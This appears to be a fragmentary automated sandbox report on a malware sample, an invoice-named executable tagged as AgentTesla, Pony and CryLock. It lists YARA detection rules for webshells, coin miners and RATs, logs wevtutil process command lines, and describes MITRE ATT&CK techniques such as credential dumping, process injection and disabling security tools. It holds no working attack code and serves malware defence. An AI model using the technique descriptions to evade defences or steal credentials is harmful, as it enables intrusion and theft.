00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000023.00000003.6282034966.0000028BD78B0000.00000004.00000001.sdmp, Author: FireEye Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Oilrig_IntelSecurityManager, Description: Detects OilRig malware, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Eyal Sela Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Winexe_tool, Description: Yara detected Winexe tool, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: wevtutil.exe PID: 1568 Parent PID: 3224

General

Start time:	16:42:21
Start date:	12/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man
Imagebase:	0x7ff784010000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 8996 Parent PID: 1568

General

Start time:	16:42:21
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff63a230000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wevtutil.exe PID: 3992 Parent PID: 3224

General

Start time:	16:42:22
Start date:	12/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Imagebase:	0x7ff784010000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 3892 Parent PID: 3992

General

Start time:	16:42:22
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff63a230000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FAKTURA I PARAGONY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: Pony

Threatname: CryLock

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Networking:

Jbx Signature Overview

AV Detection:

Location Tracking:

Cryptography:

Exploits:

Privilege Escalation:

Bitcoin Miner:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre